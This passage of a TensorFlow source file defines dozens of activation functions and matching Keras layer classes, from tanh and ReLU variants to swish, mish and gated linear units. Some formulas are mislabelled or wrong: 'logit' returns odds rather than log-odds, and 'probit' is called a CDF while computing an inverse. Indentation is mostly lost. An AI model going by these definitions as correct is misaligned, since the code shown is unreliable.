Choose some xmin and xmax, which is our "range". Everything less than than this range will be 0, and everything greater than this range will be 1. Anything else is linearly-interpolated between.
Parameters
----------
x : tensor object
xmin : int, float
min range.
xmax : int, float
max range.
Returns
-------
tensor
"""
m = 1./(xmax-xmin)
b = 1. - (m * xmax)
    # 0 below xmin, 1 above xmax, linear interpolation inside the range
    x = tf.where(x < xmin, 0., tf.where(x > xmax, 1., tf.add(tf.multiply(x, m), b)))
return x
def cll(x):
"""
Complementary Log-Log Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return 1. - (tf.math.exp(-(tf.math.exp(x))))
def bipolar(x):
"""
Bipolar Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x > 0., 1., -1.)
return x
def bipolar_sigmoid(x):
"""
Bipolar Sigmoid Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return (1. - tf.math.exp(-x))/(1. + tf.math.exp(-x))
def tanh(x):
"""
Hyperbolic Tangent Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return (2./(1. + tf.math.exp(-2.*x))) - 1.
def tanhshrink(x):
"""
TanhShrink Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x - tanh(x)
def leCun_tanh(x):
"""
LeCun's Tanh Activation Function
Used for efficient backprop.
Output Range : (-1.7159 to 1.7159)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return (1.7159 * tf.math.tanh((2./3.) * x))
def hard_tanh(x):
"""
Hard Tanh Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(-1., tf.math.minimum(1., x))
def tanh_exp(x):
"""
Tanh Exponential Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tanh(tf.math.exp(x))
def Abs(x):
"""
Absolute Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.abs(x)
def squared_relu(x):
"""
Squared Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x > 0., tf.math.pow(x, 2.), 0.)
return x
def Parametric_ReLU(x, alpha):
"""
Parametric Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
alpha : int, float
Returns
-------
tensor
"""
x = tf.where(x>0., x, alpha*x)
return x
def Randomized_ReLU(x, lower, upper):
"""
Randomized Leaky Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
lower : int, float
lower range for random.uniform.
upper : int, float
upper range for random.uniform.
Returns
-------
tensor
"""
    a = float(np.random.uniform(lower, upper))  # one slope shared by all negative inputs
x = tf.where(x>=0., x, a*x)
return x
def leaky_ReLU(x):
"""
Leaky Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>0., x, 0.01*x)
return x
def relu6(x):
"""
ReLU6 Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.minimum(tf.math.maximum(0., x), 6.)
def Mod_ReLU(x, bias):
"""
Mod Rectified Linear Unit Activation Function
Parameters
----------
x : tensor object
bias : int, float
Returns
-------
tensor
"""
x = tf.where(tf.abs(x)+bias>=0., (tf.abs(x)+bias)* (x/tf.abs(x)), 0.)
return x
def Cos_ReLU(x):
"""
Cosine ReLU Activation Function
a = σ(z) = max(0, z) + cos(z)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(0.,x) + tf.math.cos(x)
def Sin_ReLU(x):
"""
Sin ReLU Activation Function
a = σ(z) = max(0, z) + sin(z)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.maximum(0.,x) + tf.math.sin(x)
def probit(x):
"""
Probit Activation Function also known as Cumulative distribution function (CDF)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.multiply(tf.math.sqrt(2.) , tf.math.erfinv( tf.math.subtract(tf.math.multiply(x, 2), 1)))
def Cosine(x):
"""
Cosine Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.cos(x)
def gaussian(x):
"""
Gaussian Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.exp(tf.math.multiply(-0.5, tf.math.pow(x, 2.)))
def Multi_quadratic(x, px, py):
"""
Multiquadratic Activation Function
Parameters
----------
x : tensor object
px: int, float
x dimension of chosen point
py: int, float
y dimension of chosen point
Returns
-------
tensor
notes
-----
px and py must be float otherwise it will get an error.
"""
return tf.math.sqrt(tf.math.add(tf.math.pow(tf.math.subtract(x,px ),2.), tf.math.pow(py, 2.)))
def Inv_Multi_quadratic(x, px, py):
"""
Inverse Multiquadratic Activation Function
Parameters
----------
x : tensor object
px: float
x dimension of chosen point
py: float
y dimension of chosen point
Returns
-------
tensor
notes
-----
px and py must be float otherwise it will get an error.
"""
return 1./(tf.math.sqrt(tf.math.add(tf.math.pow(tf.math.subtract(x,px ),2.), tf.math.pow(py, 2.))))
def softPlus(x):
"""
Softplus or Smooth ReLU Activation Function
Output Range : (0, infinity)
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.log(1. + tf.math.exp(x))
def mish(x):
"""
Mish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tanh(softPlus(x))
def smish(x):
"""
Smish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.multiply(x, tf.math.tanh(tf.math.log(tf.math.add(1., sigmoid(x)))))
def Parametric_Smish(x, alpha = 1., beta = 1.):
"""
Parametric Smish Activation Function
Parameters
----------
x : tensor object
alpha : float, default=1.
alpha weight.
beta : float, default=1.
beta weight.
Returns
-------
tensor
notes
-----
alpha and beta must be float otherwise it will get an error.
"""
a = tf.math.multiply(alpha, x)
b = tf.math.multiply(beta, x)
return tf.math.multiply(a, tf.math.tanh(tf.math.log(tf.math.add(1., sigmoid(b)))))
def swish(x, beta):
"""
Swish Activation Function
Parameters
----------
x : tensor object
beta : int, float
Returns
-------
tensor
"""
    return x / (1. + tf.math.exp(-beta*x))  # x * sigmoid(beta * x)
def eswish(x, beta):
"""
E-Swish Activation Function
Parameters
----------
x : tensor object
beta : int, float
Returns
-------
tensor
"""
    return beta * (x / (1. + tf.math.exp(-beta*x)))  # beta * swish(x)
def hardSwish(x):
"""
Hard Swish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * (relu6(x+3) / 6)
def gcu(x):
"""
Growing Cosine Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.multiply(x, tf.math.cos(x))
def colu(x):
"""
Collapsing Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x / (1. - x*(tf.math.exp(-x-tf.math.exp(x))))
def softSHRINK(x, lambd):
"""
SOFTSHRINK Activation Function
Parameters
----------
x : tensor object
lambd : int, float
Returns
-------
tensor
"""
x = tf.where((x > (-lambd)) & (x < lambd),0.,x)
x = tf.where(x >= lambd, x - lambd, x)
x = tf.where(x <= (-lambd), x + lambd, x)
return x
def pelu(x, c, b, alpha):
"""
Parametric Exponential Linear Unit Activation Function
Parameters
----------
x : tensor object
alpha : int, float
c : int, float
b : int, float
Returns
-------
tensor
"""
x = tf.where(x>0., c*x, alpha*(tf.math.exp(x/b)-1.))
return x
def selu(x):
"""
SELU Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
scale = 1.0507009873554804934193349852946
alpha = 1.6732632423543772848170429916717
return scale * (tf.math.maximum(0.,x) + tf.math.minimum(0.,alpha*(tf.math.exp(x)-1.)))
def celu(x, alpha=1.0):
"""
CELU Activation Function
Parameters
----------
x : tensor object
alpha : int, float, default=1.0
Returns
-------
tensor
"""
return tf.math.maximum(0.,x) + tf.math.minimum(0.,alpha*(tf.math.exp(x/alpha)-1.))
def arcTan(x):
"""
ArcTang Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.atan(x)
def Shifted_SoftPlus(x):
"""
Shifted Softplus Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.math.log(0.5 + 0.5*tf.math.exp(x))
def softmax(x):
"""
Softmax Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.keras.activations.softmax(x, axis=-1)
def logit(x):
"""
Logit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x / (1.-x)
def gelu(x):
"""
Gaussian Error Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.keras.activations.gelu(x)
def softsign(x):
"""
Softsign Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x / (tf.math.abs(x) + 1.)
def elish(x):
"""
Exponential Linear Squashing Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>=0., x/(1.+tf.math.exp(-x)), ((tf.math.exp(x)-1.)/(1.+tf.math.exp(-x))))
return x
def hardELiSH(x):
"""
Hard Exponential Linear Squashing Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
x = tf.where(x>=0., x*tf.math.maximum(0., tf.math.minimum(1., (x+1.)/2.)), (tf.math.exp(x)-1.)*tf.math.maximum(0., tf.math.minimum(1., (x+1.)/2.)))
return x
def serf(x):
"""
Log-Softplus Error Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tf.math.erf(tf.math.log(1.+tf.math.exp(x)))
def elu(x, alpha):
"""
Exponential Linear Unit Activation Function
Parameters
----------
x : tensor object
alpha : int,float
Returns
-------
tensor
"""
    x = tf.where(x>0., x, alpha*(tf.math.exp(x)-1.))
return x
def phish(x):
"""
Phish Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return x * tanh(gelu(x))
def qrelu(x):
"""
Quantum Rectifier Linear Unit Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.where(x>0.,x,(0.01*(x-2))*x)
def mqrelu(x):
"""
modified QReLU Activation Function
Parameters
----------
x : tensor object
Returns
-------
tensor
"""
return tf.where(x>0.,x,(0.01*(x)) - x)
def frelu(x, b):
"""
Flexible Rectified Linear Unit (FReLU) Activation Function
Parameters
----------
x : tensor object
b : int, float
Returns
-------
tensor
"""
return tf.where(x>0.,x+b,b)
class SoftShrink(tf.keras.layers.Layer):
def __init__(self, lamd=1.0, trainable=False, **kwargs):
"""
Soft Shrinkage (Softshrink) Activation Layer
Parameters
----------
lamd : int, float
lamd factor.
"""
super(SoftShrink, self).__init__(**kwargs)
self.supports_masking = True
self.lamd = lamd
self.trainable = trainable
def build(self, input_shape):
self.lambda_factor = K.variable(self.lamd,
dtype=K.floatx(),
name='lambda_factor')
if self.trainable:
self._trainable_weights.append(self.lambda_factor)
super(SoftShrink, self).build(input_shape)
def call(self, inputs, mask=None):
return softSHRINK(inputs, self.lamd)
def get_config(self):
config = {'lambda': self.get_weights()[0] if self.trainable else self.lamd,
'trainable': self.trainable}
base_config = super(SoftShrink, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape
class HardShrink(tf.keras.layers.Layer):
def __init__(self, lamd=1.0, trainable=False, **kwargs):
"""
Hard Shrinkage (Hardshrink) Activation Layer
Parameters
----------
lamd : int, float
lamd factor.
"""
super(HardShrink, self).__init__(**kwargs)
self.supports_masking = True
self.lamd = lamd
self.trainable = trainable
def build(self, input_shape):
self.lambda_factor = K.variable(self.lamd,
dtype=K.floatx(),
name='lambda_factor')
if self.trainable:
self._trainable_weights.append(self.lambda_factor)
super(HardShrink, self).build(input_shape)
def call(self, inputs, mask=None):
return hard_shrink(inputs, self.lamd)
def get_config(self):
config = {'lambda': self.get_weights()[0] if self.trainable else self.lamd,
'trainable': self.trainable}
base_config = super(HardShrink, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape
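# Illustrative usage sketch: the shrinkage layers above suppress values whose
# magnitude is at most `lamd` (SoftShrink additionally shifts the remaining
# values toward zero by `lamd`). Assumes the module-level softSHRINK and
# hard_shrink helpers and the Keras backend `K` imported earlier in this file.
def _demo_shrink_layers():
    """Minimal sketch: apply SoftShrink and HardShrink to one sample batch."""
    x = tf.constant([[-1.5, -0.3, 0.0, 0.3, 1.5]])
    return SoftShrink(lamd=0.5)(x), HardShrink(lamd=0.5)(x)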
class GLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
GLU Activation Layer
"""
super(GLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
        out, gate = tf.split(x, num_or_size_splits=2, axis=self.dim)
gate = tf.sigmoid(gate)
x = tf.multiply(out, gate)
return x
class Bilinear(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
Bilinear Activation Layer
"""
super(Bilinear, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
        out, gate = tf.split(x, num_or_size_splits=2, axis=self.dim)
x = tf.multiply(out, gate)
return x
class ReGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
ReGLU Activation Layer
"""
super(ReGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
        out, gate = tf.split(x, num_or_size_splits=2, axis=self.dim)
gate = tf.nn.relu(gate)
x = tf.multiply(out, gate)
return x
class GeGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
GeGLU Activation Layer
"""
super(GeGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
        out, gate = tf.split(x, num_or_size_splits=2, axis=self.dim)
gate = tf.keras.activations.gelu(gate)
x = tf.multiply(out, gate)
return x
class SwiGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
SwiGLU Activation Layer
"""
super(SwiGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
        out, gate = tf.split(x, num_or_size_splits=2, axis=self.dim)
gate = tf.keras.activations.swish(gate)
x = tf.multiply(out, gate)
return x
class SeGLU(tf.keras.layers.Layer):
def __init__(self, bias=True, dim=-1, **kwargs):
"""
SeGLU Activation Layer
"""
super(SeGLU, self).__init__(**kwargs)
self.bias = bias
self.dim = dim
self.dense = tf.keras.layers.Dense(2, use_bias=bias)
def call(self, x):
        out, gate = tf.split(x, num_or_size_splits=2, axis=self.dim)
gate = tf.keras.activations.selu(gate)
x = tf.multiply(out, gate)
return x
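# Illustrative usage sketch: each gated layer above splits its input in two
# along `dim` and gates one half with the other, so the split axis must have an
# even size; a (batch, 4) input therefore produces a (batch, 2) output.
def _demo_gated_linear_units():
    """Minimal sketch: run the GLU-family layers on one random batch."""
    x = tf.random.normal((3, 4))
    return {
        'GLU': GLU()(x),
        'ReGLU': ReGLU()(x),
        'GeGLU': GeGLU()(x),
        'SwiGLU': SwiGLU()(x),
        'SeGLU': SeGLU()(x),
    }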
class ReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Rectified Linear Unit Activation Layer
"""
super(ReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return relu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Identity(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Linear Activation Layer f(x)=x
"""
super(Identity, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Identity, self).build(input_shape)
def call(self, inputs, mask=None):
return identity(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Step(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Binary Step Activation Layer
"""
super(Step, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Step, self).build(input_shape)
def call(self, inputs, mask=None):
return step(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Sigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Sigmoid Activation Layer
"""
super(Sigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Sigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class HardSigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Sigmoid Activation Layer
"""
super(HardSigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardSigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return hard_sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class LogSigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
LogSigmoid Activation Layer
"""
super(LogSigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(LogSigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return log_sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class SiLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Sigmoid Linear Unit Activation Layer
"""
super(SiLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SiLU, self).build(input_shape)
def call(self, inputs, mask=None):
return silu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ParametricLinear(tf.keras.layers.Layer):
def __init__(self, alpha=1., **kwargs):
"""
Linear Activation Layer with parameter alpha
Parameters
----------
alpha : int, float default=1.0
"""
super(ParametricLinear, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(ParametricLinear, self).build(input_shape)
def call(self, inputs, mask=None):
return parametric_linear(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class PiecewiseLinear(tf.keras.layers.Layer):
def __init__(self, xmin, xmax, **kwargs):
"""
Piecewise Linear Activation Layer
Parameters
----------
xmin : int, float
min range.
xmax : int, float
max range.
"""
super(PiecewiseLinear, self).__init__(**kwargs)
self.supports_masking = True
self.xmin = xmin
self.xmax = xmax
def build(self, input_shape):
super(PiecewiseLinear, self).build(input_shape)
def call(self, inputs, mask=None):
return piecewise_linear(inputs, self.xmin, self.xmax)
def compute_output_shape(self, input_shape):
return input_shape
class CLL(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Complementary Log-Log Activation Layer
"""
super(CLL, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(CLL, self).build(input_shape)
def call(self, inputs, mask=None):
return cll(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Bipolar(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Bipolar Activation Layer
"""
super(Bipolar, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Bipolar, self).build(input_shape)
def call(self, inputs, mask=None):
return bipolar(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class BipolarSigmoid(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Bipolar Sigmoid Activation Layer
"""
super(BipolarSigmoid, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(BipolarSigmoid, self).build(input_shape)
def call(self, inputs, mask=None):
return bipolar_sigmoid(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Tanh(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hyperbolic Tangent Activation Layer
"""
super(Tanh, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Tanh, self).build(input_shape)
def call(self, inputs, mask=None):
return tanh(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class TanhShrink(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
TanhShrink Activation Layer
"""
super(TanhShrink, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(TanhShrink, self).build(input_shape)
def call(self, inputs, mask=None):
return tanhshrink(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class LeCunTanh(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
LeCun's Tanh Activation Layer
"""
super(LeCunTanh, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(LeCunTanh, self).build(input_shape)
def call(self, inputs, mask=None):
return leCun_tanh(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class HardTanh(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Tanh Activation Layer
"""
super(HardTanh, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardTanh, self).build(input_shape)
def call(self, inputs, mask=None):
return hard_tanh(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class TanhExp(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Tanh Exponential Activation Layer
"""
super(TanhExp, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(TanhExp, self).build(input_shape)
def call(self, inputs, mask=None):
return tanh_exp(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ABS(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Absolute Activation Layer
"""
super(ABS, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ABS, self).build(input_shape)
def call(self, inputs, mask=None):
return Abs(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class SquaredReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Squared Rectified Linear Unit Activation Layer
"""
super(SquaredReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SquaredReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return squared_relu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ParametricReLU(tf.keras.layers.Layer):
def __init__(self, alpha=0.001, **kwargs):
"""
Parametric Rectified Linear Unit Activation Layer
Parameters
----------
alpha : int, float default=0.001
"""
super(ParametricReLU, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
def build(self, input_shape):
super(ParametricReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Parametric_ReLU(inputs, self.alpha)
def compute_output_shape(self, input_shape):
return input_shape
class RandomizedReLU(tf.keras.layers.Layer):
def __init__(self, lower=0., upper=1., **kwargs):
"""
Randomized Leaky Rectified Linear Unit Activation Layer
Parameters
----------
lower : int, float default=0
lower range for random.uniform.
upper : int, float default=1
upper range for random.uniform.
"""
super(RandomizedReLU, self).__init__(**kwargs)
self.supports_masking = True
self.lower = lower
self.upper = upper
def build(self, input_shape):
super(RandomizedReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Randomized_ReLU(inputs, self.lower, self.upper)
def compute_output_shape(self, input_shape):
return input_shape
class LeakyReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Leaky Rectified Linear Unit Activation Layer
"""
super(LeakyReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(LeakyReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return leaky_ReLU(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ReLU6(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
ReLU6 Activation Layer
"""
super(ReLU6, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(ReLU6, self).build(input_shape)
def call(self, inputs, mask=None):
return relu6(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ModReLU(tf.keras.layers.Layer):
def __init__(self, bias, **kwargs):
"""
Mod Rectified Linear Unit Activation Layer
Parameters
----------
bias : int, float
"""
super(ModReLU, self).__init__(**kwargs)
self.supports_masking = True
self.bias = bias
def build(self, input_shape):
super(ModReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Mod_ReLU(inputs, self.bias)
def compute_output_shape(self, input_shape):
return input_shape
class CosReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Cosine ReLU Activation Layer
a = σ(z) = max(0, z) + cos(z)
"""
super(CosReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(CosReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Cos_ReLU(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class SinReLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Sin ReLU Activation Layer
a = σ(z) = max(0, z) + sin(z)
"""
super(SinReLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SinReLU, self).build(input_shape)
def call(self, inputs, mask=None):
return Sin_ReLU(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Probit(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Probit Activation Layer also known as Cumulative distribution function (CDF)
"""
super(Probit, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Probit, self).build(input_shape)
def call(self, inputs, mask=None):
return probit(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Cos(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Cos Activation Layer
"""
super(Cos, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Cos, self).build(input_shape)
def call(self, inputs, mask=None):
return Cosine(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Gaussian(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Gaussian Activation Layer
"""
super(Gaussian, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Gaussian, self).build(input_shape)
def call(self, inputs, mask=None):
return gaussian(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Multiquadratic(tf.keras.layers.Layer):
def __init__(self, px, py, **kwargs):
"""
Multiquadratic Activation Layer
Parameters
----------
px: float
x dimension of chosen point
py: float
y dimension of chosen point
notes
-----
        px and py must be floats, otherwise an error will be raised.
"""
super(Multiquadratic, self).__init__(**kwargs)
self.supports_masking = True
self.px = px
self.py = py
def build(self, input_shape):
super(Multiquadratic, self).build(input_shape)
def call(self, inputs, mask=None):
return Multi_quadratic(inputs, self.px, self.py)
def compute_output_shape(self, input_shape):
return input_shape
class InvMultiquadratic(tf.keras.layers.Layer):
def __init__(self, px, py, **kwargs):
"""
Inverse Multiquadratic Activation Layer
Parameters
----------
px: float
x dimension of chosen point
py: float
y dimension of chosen point
notes
-----
        px and py must be floats, otherwise an error will be raised.
"""
super(InvMultiquadratic, self).__init__(**kwargs)
self.supports_masking = True
self.px = px
self.py = py
def build(self, input_shape):
super(InvMultiquadratic, self).build(input_shape)
def call(self, inputs, mask=None):
return Inv_Multi_quadratic(inputs, self.px, self.py)
def compute_output_shape(self, input_shape):
return input_shape
class SoftPlus(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Softplus or Smooth ReLU Activation Layer
"""
super(SoftPlus, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(SoftPlus, self).build(input_shape)
def call(self, inputs, mask=None):
return softPlus(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Mish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Mish Activation Layer
"""
super(Mish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Mish, self).build(input_shape)
def call(self, inputs, mask=None):
return mish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class Smish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
        Smish Activation Layer
"""
super(Smish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(Smish, self).build(input_shape)
def call(self, inputs, mask=None):
return smish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class ParametricSmish(tf.keras.layers.Layer):
def __init__(self, alpha = 1., beta = 1., **kwargs):
"""
Parametric Smish Activation Layer
Parameters
----------
alpha : float, default=1.
alpha weight.
beta : float, default=1.
beta weight.
notes
-----
        alpha and beta must be floats, otherwise an error will be raised.
"""
super(ParametricSmish, self).__init__(**kwargs)
self.supports_masking = True
self.alpha = alpha
self.beta = beta
def build(self, input_shape):
super(ParametricSmish, self).build(input_shape)
def call(self, inputs, mask=None):
return Parametric_Smish(inputs, self.alpha, self.beta)
def compute_output_shape(self, input_shape):
return input_shape
class Swish(tf.keras.layers.Layer):
def __init__(self, beta = 1., **kwargs):
"""
Swish Activation Layer
Parameters
----------
beta : int, float default=1.
"""
super(Swish, self).__init__(**kwargs)
self.supports_masking = True
self.beta = beta
def build(self, input_shape):
super(Swish, self).build(input_shape)
def call(self, inputs, mask=None):
return swish(inputs, self.beta)
def compute_output_shape(self, input_shape):
return input_shape
class ESwish(tf.keras.layers.Layer):
def __init__(self, beta = 1., **kwargs):
"""
E-Swish Activation Layer
Parameters
----------
beta : int, float default=1.
"""
super(ESwish, self).__init__(**kwargs)
self.supports_masking = True
self.beta = beta
def build(self, input_shape):
super(ESwish, self).build(input_shape)
def call(self, inputs, mask=None):
return eswish(inputs, self.beta)
def compute_output_shape(self, input_shape):
return input_shape
class HardSwish(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Hard Swish Activation Layer
"""
super(HardSwish, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(HardSwish, self).build(input_shape)
def call(self, inputs, mask=None):
return hardSwish(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class GCU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Growing Cosine Unit Activation Layer
"""
super(GCU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(GCU, self).build(input_shape)
def call(self, inputs, mask=None):
return gcu(inputs)
def compute_output_shape(self, input_shape):
return input_shape
class CoLU(tf.keras.layers.Layer):
def __init__(self, **kwargs):
"""
Collapsing Linear Unit Activation Layer
"""
super(CoLU, self).__init__(**kwargs)
self.supports_masking = True
def build(self, input_shape):
super(CoLU, self).build(input_shape)
